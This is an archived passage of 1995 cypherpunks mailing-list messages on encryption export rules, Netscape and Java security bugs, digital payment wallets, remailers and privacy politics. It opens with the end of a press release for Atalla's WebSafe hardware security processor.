essential for doing business on the Net," says Bob Gargus, President
of Atalla. "When we set out to build WebSafe, we wanted a system safe
enough to do bank transactions on the Internet. We're taking our 23
years of experience in financial network security systems and applying
it to the Internet. WebSafe is the first Internet processor that gives
banks and our other customers the security that they have come to
trust Atalla to deliver," Mr. Gargus also noted.

WebSafe is a hardware-based security processor specifically designed
to help transform today's emerging point-to-point Internet security
into a full end-to-end security system. Typical WebSafe applications
include payments (such as credit cards), web commerce, certification
authorities (electronic notarization), PEM (Privacy Enhanced Mail)
and EDI. WebSafe's security architecture is the perfect solution for
banks, brokerage houses, telecommunications companies, legal and
medical institutions or anyone who needs to send sensitive data across
the Internet. This revolutionary product protects transaction data
against unauthorized access, disclosure, alteration, duplications and
substitution. WebSafe supports both public (e.g. RSA) and secret key
(e.g. DES) technology and employs sophisticated key management
similar to global EFT/POS payment networks.

HOW THE WEBSAFE WORKS
Attached as a peripheral device to your Web servers, the WebSafe
processes your secret information in a "hardware-secured envelope."
But unlike software security solutions which are vulnerable to attack
from cyber-pirates, the WebSafe is both physically and logically
secure. Physically secure means that if anyone tries to penetrate the
WebSafe, it will "zeroize," erasing the secret data so it's impossible
to retrieve. Logically secure means that, because all of the security
processing is done within the WebSafe security processor, it's
impossible for anyone to ever see your cryptographic material.

WEBSAFE IS THE BRIDGE FROM THE INTERNET TO THE
PAYMENT NETWORK
The best example of a major deployment of an end-to-end security
network is the bank ATM system. Today, 100% of all bank ATM
transactions in North America have hardware-based security, 70% of
which is provided by Atalla. The Internet is currently going through
the same evolution that the bank ATM network went through 20-plus
years ago. What's holding back electronic commerce on the Internet
today is payments. The truth is, banks are the payment network. You
simply can't have payments without them. However, the bank payment
network and the Internet operate very differently.  For example, the
bank payment network primarily relies on secret keys (like DES) for
security, while the Internet typically relies on both secret and
public keys (like RSA). But because the two networks operate
differently, a bridge needs to be built between them. "WebSafe is the
bridge from the bank payment network to the Internet.  It combines
the best of both worlds (DES and RSA) into a single unit. And, it's
the only secure DES to RSA translation device available today...
The point is, we're not reinventing here. We're taking proven
technology that has been time tested, under the most demanding
conditions, and applying it to the Internet," states Gary Sabo,
Vice President of Product Management and Marketing for Atalla.

WEBSAFE'S CERTIFICATION AUTHORITY SUPPORT:
HOW TO VOUCH FOR SOMEONE ON THE INTERNET.
One new service that is arising is the need for electronic
notarization by Certification Authorities. They'll provide proof
that you are who you say you are. Major credit card companies, banks,
telecommunications companies and post offices are the most likely
institutions to pick up this role. The WebSafe is designed to be the
cornerstone for supplying cryptographic services for Certification
Authorities.

WEBSAFE'S SECURE KEY MANAGEMENT.
When most people talk about cryptographic security, they're talking
about a single key type. It's impossible to have security with this
method. There must be different keys for different functions. Atalla
employs a key architecture that includes hierarchal support for a wide
variety of key types, such as: Key exchange key, data encryption (DES
and RSA), PIN data, Message Authentication Code (MAC), digital
signatures, and certificates. Applying different key types for
different functions restricts how a key is used and can prevent a
security system from being spoofed into giving up secret data.
This way, even through the most complicated series of transactions,
your data is kept secure.  Founded in 1972 and acquired in 1987
by Tandem Computers Corporation, Atalla designs, manufacturers
and supports secure on-line transaction automation systems for
financial, retail and business applications. Atalla's products
include POS/POE credit/debit payment terminals, check readers,
security processors for the Internet and other networks, customer
authorization and PIN selection terminals and secure enrollment
products for banks, retailers and state EBTs. The company is
headquartered at 2304 Zanker Road, San Jose, CA 95131.
Phone: (408) 435-8850, (800) 523-9981. Fax: (408) 435-1116.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 11:00:42 PDT
To: sameer <sameer@c2.org>
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121551.IAA14535@infinity.c2.org>
Message-ID: <199510121759.NAA22465@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



sameer writes:
> > Well, in addition, universal deployment of Photuris and IPSP would
> > probably prevent the sort of active attack being discussed because you
> > could no longer replace the packets.
> 
> 	Do you think the major OS/router vendors are going to
> implement IPSP int heir stacks with standing export restrictions? I
> don't think so.

I do, because if they want to be IPv6 compliant they have to. They'll
have to produce separate export versions of the software.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Thu, 12 Oct 95 11:14:54 PDT
To: cypherpunks@toad.com
Subject: Re: RSA Data Security, Inc. To Exclusively License Rights to RSA
In-Reply-To: <9509128135.AA813510342@snail.rsa.com>
Message-ID: <9510121814.AA02009@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> RSA Data Security, Inc. 
> today announced that it is now licensing patents for the Digital Signature 
> Standard (DSS), the U.S. government standard for digital signatures.

I believe someone was suing the U.S. government on the grounds that the
public signature standard wasn't supposed to require proprietary 
technology.  Has this gone anywhere yet?

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 11 Oct 95 22:10:23 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Noise: Re: CJR for perl-RSA t-shirt
In-Reply-To: <Pine.3.89.9510112155.A49472-0100000@aix2.uottawa.ca>
Message-ID: <199510120509.PAA14542@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello s1018954@aix2.uottawa.ca
 
> On Thu, 12 Oct 1995, Jiri Baum wrote:
> 
> > 
> > Perhaps somebody should make IDEA shorts?
> > 
> > Then it would be interoperable with PGP...
> > (Would tooooo. You just have to remember what the header is.)
> 
> You'd still need an MD5 necktie.

Actually, you don't - you just don't get signatures without it.
However, authentication AFAIK was never a problem to export,
so there's no need to bother.

If you are reading a signed message, you simply strip off the
signature without checking it (or you leave it on and pass it
through a hypothetical exportable auth-only PGP).

For creating messages, you have to make do without signatures.

What you *would* need would be a coin, but I guess this is
generally available (you know, flip it a hundred times to
generate the session key).

> (and your matching stealth sunglasses? When does this go too far?
> This ridiculous looking figure is begging for its own worlds chat avatar.
> Violate ITAR and good fashion in vr. Which begs the question, would anyone
> notice if First Cypherpunks Bank were operating in such a networked video 
> game? Now *that* would be a non-bank financial institution. I can just 
> see it in court: "your honor, the disclaimer clearly says it is all a game,
> the state's agents have simply suspended all disbelief". Talk about stego.)

Hmm, just like Monopoly money, I guess.

Nobody's been busted yet for printing that, have they.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMHyi5ixV6mvvBgf5AQGttgQA2LpV4T7QTZvZ6C0NajnFmsDvAEOZuqVR
N9rL9fiBh52KWTRYxqr/284onyJFkgyMUljDggSZvfNlhx3kV/J03Yne+sJAMoL1
NOVOoQtKAbbQ1ixD8fXMD1ybehmU1BaB2VVfwrY7vdn4gky6ZUlpU/4dQ3hArms3
Ni63Gaf7iwE=
=33pa
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 15:11:52 PDT
To: cypherpunks@toad.com
Subject: Netscape 2.0b1J still core dumps on Java
Message-ID: <199510122211.PAA24518@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I pointed the latest beta (Solaris 2.4) towards this URL:

http://java.sun.com/JDK-prebeta1/applets/CardTest/example1.html

...and, lo and behold, it core dumped with a Bus error. It's unlikely
that the bug is in Java itself, as I was able to successfully run the
example from Sun's JDK appletviewer.

Not impressed yet.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 12 Oct 95 12:19:29 PDT
To: cypherpunks@toad.com
Subject: (fwd) checkfree/cybercash diff
Message-ID: <v02120d10aca3190df3c1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Thu, 12 Oct 95 14:34:46 +0100
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
To: www-buyinfo@allegra.att.com
Subject: checkfree/cybercash diff

Hi all,

I studied both websites regarding their wallet system. I noticed a press
release that checkfree will license cybercash technology and develope
products. I saw _no_ release that checkfree has already released a cybercash
wallet compatible SW.

But I cannot find any difference between cybercash wallet and checkfree wallet.
Is it behind the open part of the tech information?

Who can make things clear???


read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Thu, 12 Oct 95 12:37:02 PDT
To: John Lull <lull@acm.org>
Subject: Re: java security concerns
In-Reply-To: <199510101714.KAA07329@ix2.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951012154149.13206E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Oct 1995, John Lull wrote:

> On Mon, 09 Oct 1995 17:30:38 -0700, cmcmanis@scndprsn.Eng.Sun.COM
> (Chuck McManis) wrote:
> 
> > >By the way, I suggest that Sun should offer a large money prize for
> > >the first significant security hole found the Java implementation. Its
> > >a tiny price to pay for security.
> > 
> > I don't think the lawyers would let us. 
      ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
I think this means they didn't ask.
If they did, perhaps the problem is their ability to say with a straight 
face that their product is "secure" while at the same time running a 
contest to find insecurities!

EBD


> 
> Pardon my French, but if your lawyers make it impossible to do
> technical work correctly, isn't it time to get new lawyers?  I can't
> see how offering a reward for reporting bugs could possibly be
> objectionable to any rational lawyer.
> 
> This can be a VERY useful (and very inexpensive) debugging technique.
> Didn't Knuth offer a cash reward to the first person to find each typo
> in his "Fundamental Algorithms" series -- and then doubled the amount
> each year?
> 
> It can also be a very useful teaching tool, in that it encourages
> users to explore little-used corners of a system.
> 
> I applaud any company that has the guts to do it.
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Thu, 12 Oct 95 15:48:56 PDT
To: cypherpunks@toad.com
Subject: http://www.cs.berkeley.edu/~raph/javatest.html
Message-ID: <199510122248.PAA18979@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Plcurechaxf jevgr pbqr!

Encuc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Thu, 12 Oct 95 13:17:13 PDT
To: cypherpunks@toad.com
Subject: smartcard encryption: revised paper available
Message-ID: <9510122024.AA06402@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


I've put a (slightly expanded) revised version of my paper, "High-
Bandwidth Encryption with Low-Bandwidth Smartcards" in my ftp directory.
This paper describes a little protocol for exploiting the secure key
storage facilities of slow smartcards but with the host processor
doing most of the actual work.

ftp://ftp.research.att.com/dist/mab/card_cipher.ps

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 12 Oct 95 14:39:22 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <Pine.3.89.9510121517.B6143-0100000@offshore.com.ai>
Message-ID: <Pine.3.89.9510121633.A6162-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



The NYT claim was about as sensible as saying MS-DOS is the structure of
the Internet and is not safe, so the Internet is not safe.  We could as
well have viruses spreading on floppies for MS-DOS (there are far more
people on the Internet using MS-DOS than NFS) that cause your MS-DOS
Netscape to send the unencrypted credit card numbers off to a certain
anonymous email address.  Now watch, someone will try this.  Oh well.  It
really has nothing to do with the Internet or Netscape. 

I hope Markoff gets this: The fact that Internet communication is not
inherently secure does not mean that it can not be made secure.  Note that
an insecure phone-line can be made secure by using a phone with a
scrambler.  The same can be done on the Internet and is being done - by
companies like Netscape.  

By far the biggest obstacle to a secure Internet is the governments ITAR
regulations.  This has made it impractical to put real security into NFS,
FTP, Unix, and WWW.  Many of our current security problems are really due
to "the basic structure of ITAR" but none are due to the "basic structure
of the Internet". 

It sort of pains me to see this kind of hype, but it will probably push
companies to get real security faster.  So in the long run it may not be
such a bad thing.  Also, it may be easier to pressure the government to
get rid of the ITAR restrictions.  And they say any publicity is good
publicity, so it probably will not really hurt the Internet at all.  

  --  Vince

>    San Francisco, Oct. 10 -- Newly publicized weaknesses in
>    the basic structure of the Internet [...]
>[...]
>    The problem is not Netscape's alone; it potentially affects
>    any organization that operates a computer from which files
>    or software could be downloaded over the Internet. The
>    weakness can be traced to the technical underpinnings of
>    the network, [...]
> 
>    The disclosure of the flaws casts doubt on the aspirations
>    of companies like Netscape, which last summer had one of
>    the most successful stock offerings in Wall Street history
>    based on the promise of the impending arrival of a
>    full-fledged on-line marketplace.
>[...] 
>    The newly publicized weakness occurs in a widely used
>    Internet protocol -- or technical standard -- known as the
>    Network File System, or NFS. Because NFS does not have any
>    means for allowing the recipient of a program or document
>    to verify that it has not been altered during transmission
>    from the file server to the user, any interception or
>    tampering would go undetected.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Thu, 12 Oct 95 14:18:00 PDT
To: cypherpunks@toad.com
Subject: FWD: International Encryption Protocols
Message-ID: <Pine.BSD/.3.91.951012170741.12446A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


To: "Frank O'Dwyer" <fod@fws.ilo.dec.com>
cc: firewalls@GreatCircle.COM (Firewalls Mailing List)
From: Justin Mason <jmason@iona.ie>
Subject: BoS: Re: International 
Encryption Protocols 

Frank O'Dwyer sez:

>After all, if the CoCom countries _weren't_ willing to sell each other 
>crypto equipment, how could they spy on one another?  :-)
>
>(Actually the :-) may not be necessary - I believe there was a story
> in the news recently about the UK 'authorities' snooping on Irish
> official traffic carried on UK-supplied equipment.)

Almost right -- it was the UK surveillance service (GCHQ) snooping on
Irish official traffic carried on US-supplied crypto equipment.
Apparently, the equipment in question had a "back door", courtesy of
the NSA; when GCHQ found out that the Irish govt were using this
equipment, they had only to ask their NSA pals for the details.

I only heard the details myself via a popular-science program on crypto
;), so the so-called back door may not have been a deliberately
weakened algorithm, it may have been a set of keys from an key-escrow
repository or some such.

--j.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lawrence C. Stewart" <stewart@OpenMarket.com>
Date: Thu, 12 Oct 95 14:16:21 PDT
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: (fwd) checkfree/cybercash diff
In-Reply-To: <v02120d10aca3190df3c1@[199.0.65.105]>
Message-ID: <199510122116.RAA11126@arctic.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


> But I cannot find any difference between cybercash wallet and checkfree wallet.
> Is it behind the open part of the tech information?

Probably we should wait for Donald Eastlake (Cybercash) or someone from
Checkfree to chime in here, but here's my understanding:

History:
	Cybercash has a client application, which currently handles credit
cards, and will add support for EFT payments.  The Checkfree app talks
to the Cybercash gateway to the financial nets, via merchant software.

	Checkfree/Spyglass/V-One/Tandem demo'd a "Wallet" at Spring
Internet World, which currently handles credit cards, and will add support
for bill-payment and/or check-writing, via Checkfree's service.

My understanding of the technical similarities/differences:

	The credit card handling is essentially the same as iKP/STT/SEPP, etc.
however, I think Cybercash's sytem hands off the card number to the
Cybercash Server and then deals in handles, while the Checkfree system
stores the card number encrypted on the PC, and passes it along each time.
If this is true, it makes the Cybercash system reasonably resilient to off-line
local password guessing attacks.

	A feature of the Checkfree thing is that it comes pre-loaded
with a whole bunch of public keys of gateway operators (current and 
prospective).  As gateway operators come on line, they are assigned a key
from the pool.  This makes it "open" to multiple gateway operators.
The implementation I saw had only a 4-digit PIN protecting the local
card-storage file, so it is not terribly secure against anyone who gets
access to the PC.  Obviously a pass-phrase would help a lot here.

My understanding of the techno-politics:

	Cybercash will adopt STT/SEPP for credit cards, abandoning its own
wire protocol.  Both Checkfree and Cybercash will share the client app, and
add their respective support for EFT, micropayments, and check-writing.

-Larry Stewart
Open Market Inc.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 12 Oct 95 17:16:30 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: netscape 2 certification authorities
In-Reply-To: <199510122246.SAA07849@homeport.org>
Message-ID: <199510130016.RAA14262@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Adam Shostack <adam@lighthouse.homeport.org> writes:
> The new betas of Netscape store CA trust stuff in a NDBM
> database.  Does anyone have good tools for looking at NDBM stuff?

Perl's my favorite.  Here's a code fragment that might help.  All you
need to do is open the ndbm file (foo.pag/foo.dir in this case) and aim it
at an associative array, then have your way with it.

	Jim Gillogly
	Sterday, 22 Winterfilth S.R. 1995, 00:14
----------------------------------------------------------------------------
#!/usr/bin/perl

dbmopen(%baz, "foo", 0600);

# At this point just access %count the way you would any other assoc array
# For example, to list it all:

while (($key, $value) = each %baz)
{
	printf "Key $key, value $value\n";
}

dbmclose(baz);

----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Thu, 12 Oct 95 14:35:07 PDT
To: cypherpunks@toad.com
Subject: Identity database, another attempt...
Message-ID: <Pine.SOL.3.91.951012172747.18484C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, you ungrateful wretches objected to our great 
employment database and national ID card plans when they 
were presented as a means of immigration control.  How 
about this, then:  We need an employment-tracking 
database and licenses for everything so we can crack
down on "deadbeat dads."  Now that sounds more plausible,
doesn't it!

Please?  We really want to track you closely.  It's for 
your own good, you know.


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
AP reported on 10/12/95:

  Deadbeat parents beware: Pay up or lose your license. And not 
  just your driver's license. Your hunting, fishing, trapping,
  boating, occupational and professional licenses may be taken 
  away too. 
   
  That's the promise that Congress, intensifying the fight against 
  parents who refuse to support their children, intends to send to 
  millions of deadbeats as it writes final legislation to transform 
  the nation's anti-poverty programs. ...
 
  Central to [House and Senate proposals ...] is a requirement that 
  every state have a program to revoke or restrict the licenses of 
  parents who fail to pay, along with a central registry to track 
  new hiring and match employment records with child support 
  obligations.  ...

[Can you say "10th Amendment," Robert Dole?  I knew you could!
You are against this, aren't you Bob?  Bob?  Bob??!!]


  The Department of Health and Human Services ...  estimates that if
  every state had a license revocation program in place, child support
  collections would grow by $2.5 billion over 10 years. 

[During which time the federal government will spend $20,000 billion.
Relative peanuts, in other words.]


  According to HHS, 32 states and Puerto Rico now have laws on the books to
  restrict or revoke driving privileges and professional, occupational or
  sporting licenses. ...     ^^^^^^^^^^


[Note that driving, necessary for living in most places, is now a 
*privilege* granted by the government.  In other words, *living* is
a government-granted privilege.]

  Paula Roberts, a child support expert with the Center for Law and 
  Social Policy, a liberal research and advocacy group in Washington, 
  said license revocation programs can be effective -- but only if 
  states have the necessary computers in place.  ...




Essay questions for extra credit:  

(1.) Explain how an advocate of the proposed system of monitoring 
and control could be considered "liberal."  

Or "conservative."


(2.) How many (ab)uses of this system are possible and
how long will it take for them to be implemented?


(3.) Compare and contrast this plan with the Soviet 
internal passport / labor book system.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Thu, 12 Oct 95 14:39:20 PDT
To: cypherpunks@toad.com
Subject: Anguilla Cypherpunks Meeting
Message-ID: <Pine.3.89.9510121731.A6228-0100000@offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


ANGUILLA CYPHERPUNKS MEETING

The meeting will be held at my house, Sunday Oct 29.  My address is "Old
Ta".  Really, we have only a couple named streets in this country and no
street signs or addresses.  My area is called "Old Ta" because the Old
Water Tower was near me. :-) If you don't know where I live you are
probably off-island, and I can just pick you up at the airport.  You are
welcome to stay the week around the meeting (like Oct 25 to Nov 1 or some
such). 

Anguilla is a fantastic little country in the Caribbean with wonderful
beaches and no taxes.  I have been living here for almost a year now and
just love it.  Right now American Airlines has some specials on that make
flying to Anguilla a bit cheaper than normal.  For example: 

   New York to Anguilla $365.95 rt
   San Jose to Anguilla $574.95 rt

For these prices the tickets must be purchase by Oct 16th. 

Please let me know if you are coming so I will be sure to have enough
space.  If we get too many people we may need some airmattresses or
something.  It is warm here, so sleeping bags are not needed. 

If while you are outside the USA you want to write some software that uses
encryption and sell it worldwide, let me know.  I could put you up while
you wrote it and my company could sell it for share of the selling price. 
Let me know what you are thinking of and how long you think it would take. 

   --  Vince



-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQCVAgUBMH0ZDsh6X5WuK8MNAQFqZAP+IF9OvHRsCFuRVGxH3q9jSC8Hh5rxvv9C
Z6xD52PdxADM5RLxOwiuhWITStbpNL9R4T+v+mu6VnjPgifnORrS7mEM4tsmWTLT
9LJ9R4p8Q51hjXy889AOcB6Tl0rmkXouRklzYKeq/m0PnL2smt6WDF3owgq65c73
4/odioz0Oic=
=6pbC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 12 Oct 95 10:09:37 PDT
To: cypherpunks@toad.com
Subject: Aquaria wars ?
Message-ID: <9510121708.AA00880@elysion.eiss.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



I need some historical information for a discussion about which
security features are to be used in usenet. Perhaps someone can help:


Some (many) years ago there was a very large and long flamewar at the
usenet. As far as I know it was called "The Aquaria Wars" because it
began with a debate about the question whether the newsgroup should be
named "alt.aquaria" or "alt.aquarium". I am looking for historical
informations about this flamewar.

Can anyone remember it or is there anything available about?

Thanks a lot

Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 12 Oct 95 15:43:03 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: netscape 2 certification authorities
Message-ID: <199510122246.SAA07849@homeport.org>
MIME-Version: 1.0
Content-Type: text


	The new betas of Netscape store CA trust stuff in a NDBM
database.  Does anyone have good tools for looking at NDBM stuff?


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 12 Oct 95 16:12:07 PDT
To: Brad Dolan <bdolan@use.usit.net>
Subject: Re: Identity database, another attempt...
In-Reply-To: <Pine.SOL.3.91.951012172747.18484C-100000@use.usit.net>
Message-ID: <Pine.SUN.3.91.951012190532.19320A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 12 Oct 1995, Brad Dolan wrote:

>   restrict or revoke driving privileges and professional, occupational or
>   sporting licenses. ...     ^^^^^^^^^^
> 
> 
> [Note that driving, necessary for living in most places, is now a 
> *privilege* granted by the government.  In other words, *living* is
> a government-granted privilege.]

Luckily other governments will still grant you driving licenses so you 
just have to take a foreign trip.

It's clear that the Federal Job Licensing system is meant to be 
extended to denial of work rights for deadbeat dadism, tax evasion, 
overdue library books, whatever.  Certainly encourages self employment.

DCF

"Do you have a moral right to register your kid.  Wait till he grows up 
and ask him if he wants to be registered."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 12 Oct 95 19:30:06 PDT
To: zoetrope@infinet.com
Subject: Re: Netscape beta 2.0
In-Reply-To: <m0t3YoM-000K8BC@mail.infinet.com>
Message-ID: <199510130224.TAA04729@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Hey those shirts aren't measly! They're high quality Fruit of
the Loom shirts, limited edition, etc. etc. Personalized even. Just
ask the people who have received them. (Non-us winners haven't received
them yet, I haven't shipped them yet.)

> 
>         For Finding a security bug in Netscape, is it true you only get a
> measly shirt? if that is true why not just start a virus?  
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 12 Oct 95 16:51:37 PDT
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: netscape 2 certification authorities
In-Reply-To: <199510122246.SAA07849@homeport.org>
Message-ID: <199510122351.TAA22805@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	The new betas of Netscape store CA trust stuff in a NDBM
> database.  Does anyone have good tools for looking at NDBM stuff?

Perl treats NDBM files as if they are internal arrays if you ask it to
-- I often examine strange NDBM files this way. Its pretty convenient
for the task.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 03:33:21 PDT
To: jirib@cs.monash.edu.au
Subject: Re: MITM attacks and True Names (again...)
In-Reply-To: <199510120358.NAA14220@sweeney.cs.monash.edu.au>
Message-ID: <199510120905.AA47595@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> all a True Name is really necessary for
>> is violence.  (And, pending certain eagerly-awaited technological
>> developments, for sex.))
>Why is a true name necessary for sex? It should be feasible to arrange
>a romantic rendezvous without True Names, no?
>How often have you checked IDs before going on a date?
>(I think most normal people would notice a MITM during, er, never mind.)
>Anything I've missed?

Does the swapping of DNA keys on a patrol cars hood constitute sufficient
LEA monitoring? You can even deliver them your key if you think you can
run fast enough. This might be a situation where they would prefer you use
encryption wrappers rather than a cleartext transfer.

Safe swapping.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Thompson <stevet@ultratech.net>
Date: Thu, 12 Oct 95 17:14:38 PDT
To: John Young <jya@pipeline.com>
Subject: Re: GOB_ble
In-Reply-To: <199510091151.HAA05403@pipe4.nyc.pipeline.com>
Message-ID: <Pine.LNX.3.91.951012201116.14431D-100000@crimethink.ultratech.net>
MIME-Version: 1.0
Content-Type: text/plain


----------------------------------------------------------------
Steve Thompson       
BOFH, System Admin,        Nothing indicates shoddy workmanship
ultratech.net              more than lumps in the duct tape.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 12 Oct 95 03:41:31 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: Re: NYT on Internet Flaws
In-Reply-To: <"swan.cl.cam.:277260:951012071149"@cl.cam.ac.uk>
Message-ID: <199510120923.AA47909@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> Not possible. Reporters don't call you for a quote and then send you a draft
>> of the article for your approval before they publish. They call for a quote,
>> write their article, and publish, not asking for approval.
>
>Depends how well you train them !

Lets train them. Someone post their email addresses so we can send them all
the RFCs for their education. :) They need to know what the hell they are
talking about.

I wonder if the biology lists get this, some wannabe hero posting how billions
of people are infected with deadly toxins just because some researcher
mentioned a well known fact that an amount of various bacteria and toxins
exist in all living mammals.

Werd.
Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C.CREUTZIG@BIONIC.zerberus.de (Christopher Creutzig)
Date: Fri, 13 Oct 95 18:44:07 PDT
To: cypherpunks@toad.com
Subject: Re: List of reliable remailers
In-Reply-To: <199510091350.GAA12733@kiwi.cs.berkeley.edu>
Message-ID: <zp8102aBYnuqZ16d@bionic02.bionic.zerberus.de>
MIME-Version: 1.0
Content-Type: text/plain


RL> ford     remailer@bi-node.zerberus.de     *+               6:37  10.73%

 The problem should be fixed. I had asked the remailer to use a
non-existant temp dir, so it just quit silently...

---
Christopher Creutzig                | c.creutzig@bionic.zerberus.de
PGP-verschlsselte Nachrichten bevorzugt -- benutzt Briefumschlge!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Thu, 12 Oct 95 21:20:20 PDT
To: cypherpunks@toad.com
Subject: Serial port radiation detector?
Message-ID: <199510130416.VAA01611@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sometime back during the RNG discussion I though I saw mention of a radiation
detector that would plug into a PC's serial port and was fairly inexpensive.
Any information about this would be appreciated.
- -- 
Jeff Simmons                           jsimmons@goblin.punk.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH3n/uL8IP70uJJBAQE7RwP/dQD9t8H8Es+3XmQLJgoq4hikPrJsJUuY
wEdLuDH20oqByiRQm/Jv5N4HaYlLsm9cPV3DnxPNuKji0PhQn6FNsxBNw8gorCMt
